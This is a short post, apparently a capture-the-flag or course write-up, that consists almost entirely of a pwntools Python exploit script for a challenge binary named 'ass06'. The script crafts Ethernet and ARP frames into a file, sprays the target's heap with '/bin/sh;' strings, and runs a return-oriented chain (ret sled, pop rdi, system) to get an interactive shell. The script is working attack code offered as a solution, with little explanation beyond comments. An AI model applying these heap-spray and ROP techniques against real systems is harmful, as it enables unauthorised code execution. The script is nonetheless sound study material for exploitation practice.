
ass06 exploit

by St1tch

아는 사람들은 아는 문제 exploit!


import binascii

from pwn import *
# pwntools verbosity: 'info' keeps the log.progress()/log.success() messages emitted below visible.
context.log_level = 'info'
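def trans_ip(addr):
    """Pack a dotted-quad IPv4 string into its 4 raw bytes (as a str).

    Each octet is parsed with ``int`` -- the original used ``eval`` on every
    octet, which is never needed to read a decimal literal -- and rejected if
    it is outside 0..255, so the result is always exactly four bytes.

    Raises:
        ValueError: an octet is not a decimal integer in 0..255.
    """
    octets = []
    for piece in addr.split('.'):
        value = int(piece)
        if not 0 <= value <= 255:
            raise ValueError('IPv4 octet out of range: {!r}'.format(piece))
        octets.append(chr(value))
    return ''.join(octets)


def trans_mac(mac):
    """Decode a colon-separated hex MAC string ('00:0c:...') into its 6 raw bytes.

    ``binascii.unhexlify`` replaces the Python-2-only ``str.decode('hex')``
    and gives the same result on both interpreters.
    """
    return binascii.unhexlify(mac.replace(':', ''))


def p16(x):
    """Pack ``x`` as a 2-byte big-endian field.

    NOTE: this deliberately shadows pwntools' own ``p16`` (which is
    little-endian by default); the EtherType/command fields built below
    must be network byte order.
    """
    return struct.pack('>H', x)


def padd(x):
    """Right-pad a frame with 'a' bytes to 1514 bytes.

    1514 is presumably the fixed frame size the target reads
    (14-byte Ethernet header + 1500-byte payload) -- verify against the binary.
    """
    return x.ljust(1514, 'a')


def execmd(cmd):
    """Run ``cmd`` through the shell and return its captured stdout.

    ``shell=True`` is kept because the only caller on this page passes a
    pipeline ('cat ... | grep ...'); only hand this internally constructed
    command strings, never anything derived from the target's output.

    Raises:
        subprocess.CalledProcessError: the command exits non-zero
            (e.g. grep matching nothing).
    """
    return subprocess.check_output(cmd, shell=True)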
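def custom_packet():
    """Assemble the frame file the target consumes and write it to ./a.

    Reads the module-level ``heap`` (set in ``__main__``) to derive the two
    heap addresses embedded in the frames, and logs success when done.
    Frames are written in the order pay1, pay1, pay2, arp_pay2, pay3.

    Side effects:
        Creates/overwrites the file 'a' in the current directory -- the same
        path ``__main__`` hands to the target on its command line.
    """
    mac1 = trans_mac('00:0c:0f:14:15:17')
    ip_p = p16(0x0800)    # EtherType: IPv4
    arp_p = p16(0x0806)   # EtherType: ARP
    ip1 = trans_ip('128.128.0.100')
    # Two-byte field appended right after ip_default; meanings are the
    # original author's annotations.
    fwd_p1 = p16(0x0208)  # new
    fwd_p2 = p16(0x0202)  # delete
    fwd_p3 = p16(0x0200)  # execute
    # Ethernet header (destination mac1, filler source MAC, EtherType) followed
    # by filler whose exact layout is dictated by the target's parser, which
    # is not shown on this page.
    ip_default = mac1 + 'a' * 6 + ip_p + 'b' * 16 + ip1 + 'a' * 2
    # Standard ARP fixed header after the Ethernet header: hardware type 1
    # (Ethernet), protocol 0x0800 (IPv4), address lengths 6/4, opcode 1
    # (request), then a filler sender MAC.
    arp_default = (mac1 + 'a' * 6 + arp_p + '\x00\x01' + '\x08\x00'
                   + '\x06\x04' + '\x00\x01' + 'a' * 6)
    # Return-oriented chain; every address is hard-coded for this challenge
    # binary and this run's heap base (see ``heap`` in __main__).  160 plain
    # 'ret' gadgets, then pop rdi <- heap+0x10, then system.  heap+0x10 is
    # presumably where the string sprayed by spray() lands -- confirm in a
    # debugger rather than trusting the constant.
    poprdi = p64(0x406853)
    binsh = p64(heap + 0x10)
    addr = p64(heap)
    system = p64(0x4013e0)
    ret = p64(0x401309)
    payload = ret * 160 + poprdi + binsh + system
    pay1 = padd(ip_default + fwd_p1)
    pay2 = padd(ip_default + fwd_p2)
    pay3 = padd(ip_default + fwd_p3 + 'a' * 2 + payload)
    arp_pay2 = padd(arp_default + 'b' * 18 + addr + 'A' * 1400)
    # Context manager instead of open(...).write(...) so the handle is closed
    # and the data flushed before __main__ starts the target on this file.
    with open('a', 'wb') as out:
        out.write(pay1 + pay1 + pay2 + arp_pay2 + pay3)
    log.success('Success making payload.')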
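def spray(addr):
    """Repeatedly feed the target a fixed record block until its heap grows past ``heap``.

    Uses the module globals set in ``__main__``: ``s`` (the target process),
    ``pid`` (its process id) and ``heap`` (the address the heap mapping must
    extend beyond).  Every 1000 iterations the target's /proc/<pid>/maps
    is read and the loop stops once the [heap] mapping's end address exceeds
    ``heap``; otherwise it gives up after 100000 iterations without logging
    success.

    Args:
        addr: 32-bit value packed into every sprayed record.

    Raises:
        subprocess.CalledProcessError: the maps lookup finds no 'heap' line
            (grep exits non-zero).
        IndexError: the heap line yields fewer than two 8-hex-digit runs.
    """
    s.sendlineafter('>>', '2')
    s.sendlineafter('>>', '2')
    progress = log.progress('target addr = {}, spraying....'.format(hex(heap)))
    # The per-send block does not depend on the loop counter, so build it once:
    # (8 records of five '1' lines + "/bin/sh;" + '#'*8 + addr, then 8 '2' lines) x 20.
    block = (('1\n' * 5 + '/bin/sh;' + '#' * 8 + p32(addr) + '\n') * 8
             + '2\n' * 8) * 20
    for cnt in range(100000):
        progress.status(str(cnt + 1))
        if cnt % 1000 == 0:
            res = execmd('cat /proc/{}/maps | grep heap'.format(pid))
            print(res)
            # Raw regex (the original '[\w]' is an invalid escape on Python 3).
            # Index 1 is presumably the end address of the 'start-end' field
            # on the [heap] line; this silently breaks if addresses are wider
            # than 8 hex digits.
            if int(re.findall(r'[\w]{8}', res)[1], 16) > heap:
                progress.success('spray success!')
                s.clean(0.0001)
                break
        s.send(block)
        s.clean(0.0001)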
if __name__ == '__main__':
    # Expected heap base for this run; read by custom_packet() (addresses
    # embedded in the frames) and by spray() (stop condition).  It is a
    # hard-coded constant, so it assumes the target's heap is mapped at the
    # same address every run -- TODO confirm / adjust per run.
    heap = 0x03101000
    custom_packet()
    # Start the target with the freshly written frame file passed three times.
    s = process(['./ass06', './a', './a', './a'])
    pid = util.proc.pidof(s)[0]
    # pwntools pause(): waits for the operator before spraying (e.g. to attach
    # a debugger first).
    pause()
    spray(0x4029b5)
    s.sendline('3')
    s.interactive()